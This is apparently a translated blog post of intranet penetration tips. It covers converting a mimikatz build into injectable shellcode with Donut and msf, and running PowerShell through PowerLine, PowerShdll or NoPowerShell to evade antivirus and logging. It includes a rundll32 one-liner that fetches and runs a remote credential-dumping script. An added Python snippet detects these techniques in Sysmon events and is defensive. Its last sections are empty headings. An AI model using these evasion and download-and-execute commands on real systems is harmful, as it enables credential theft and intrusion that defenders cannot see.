Intranet penetration skills

Penetration techniques

msf+Donut interactive execution program

Introduction

Tool: Donut

Donut generates x86 or x64 Shellcode from VBScript, JScript, EXE, DLL (including .NET assembly) files. This shellcode can be injected into arbitrary Windows processes for in-memory execution.

Instructions
  1. First, generate a backdoor program with msf and execute it.

  2. Then run Donut on the executable to convert it into shellcode:

    ./donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -o /tmp/payload.bin

    -a: target architecture; 2 selects 64-bit
    -o: output file

    This produces the shellcode file /tmp/payload.bin.

  3. Execute the shellcode with the msf module.

This gives an interactive mimikatz session.

Running PowerShell without powershell.exe

PowerLine
Introduction

PowerLine is a tool written in C# that supports both local command-line and remote invocation. It can run PowerShell scripts without directly calling PowerShell. Its advantages are:

  • Automatically detects Windows 7 and Windows 10
  • Easy to use, no complicated IDE required
  • Automatic XOR encoding of the embedded scripts


Usage
  • First clone the project locally, then run the build.bat file.

  • Then fill in the path of each PowerShell script you need to call in the UserConf.xml file. By default it ships with PowerUp, PowerView, Mimikatz, etc.; add your own .ps1 paths following the format the author provides.

  • After adding the scripts, run PLBuilder.exe to build.

PowerShdll
Introduction

PowerShdll runs PowerShell through a DLL instead of starting powershell.exe, which gives it some ability to bypass AV. The DLL can be hosted by rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe or regsvr32.exe, or the standalone .exe provided by the author can be used instead.

Usage
  • Run PowerShdll with -i to enter interactive mode; this gives you an interactive PS environment in which you can execute any PowerShell command.

  • DLL version usage (the DLL's main export is invoked through rundll32):

    rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;

Nopowershell
Introduction

NoPowerShell is a tool implemented in C# that supports executing PowerShell-like commands while remaining invisible to all PowerShell logging mechanisms (it reimplements the commands natively rather than hosting the PowerShell engine). A Cobalt Strike .cna script is also provided.

Usage

.\NoPowerShell.exe

Run it directly to print the version and the help listing of available commands.
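From the defender's side, the common thread of PowerLine and PowerShdll above is that the PowerShell engine (System.Management.Automation.dll) is still loaded, just by an unusual host process, and PowerShdll's DLL variant shows up as rundll32 invoking a DLL's main export. The following added example (not from the original post) runs two such checks over constructed Sysmon-style process-creation and image-load events; the allowlist of known hosts and the event field names are assumptions to adapt to your telemetry. It does not catch NoPowerShell, which never loads the engine.

```python
import re

# Assumed allowlist of processes expected to load the PowerShell engine; tune per environment.
KNOWN_PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe", "wsmprovhost.exe"}
ENGINE_DLL = "system.management.automation"
# Download-and-run cmdlets that often appear in rundll32-hosted PowerShell one-liners.
PS_ARG_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)

def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return an alert string for a suspicious event, or None."""
    if ev["id"] == 7:  # image loaded
        if ENGINE_DLL in image_name(ev["image_loaded"]) and image_name(ev["image"]) not in KNOWN_PS_HOSTS:
            return f"PowerShell engine loaded by non-standard host: {ev['image']}"
    elif ev["id"] == 1 and image_name(ev["image"]) == "rundll32.exe":  # process created
        m = re.search(r"(\S+\.dll),main\b", ev["command_line"], re.I)
        if m and PS_ARG_RE.search(ev["command_line"]):
            return f"rundll32 invoking main export of {m.group(1)} with PowerShell-like arguments"
    return None

def scan(events):
    """Run check_event over a list of events and collect the alerts."""
    return [a for a in (check_event(e) for e in events) if a]

# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32 C:\Users\u\PowerShdll.dll,main . { iwr -useb https://example.invalid/s.ps1 } ^| iex;"},
    {"id": 7, "image": r"C:\Windows\System32\rundll32.exe",
     "image_loaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.dll"},
    {"id": 7, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image_loaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.dll"},
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32 shell32.dll,Control_RunDLL"},  # benign rundll32 use, no alert
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```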

SyncAppvPublishingServer
Introduction
Usage

msbuild


Source: blog.csdn.net/qq_43271194/article/details/110393788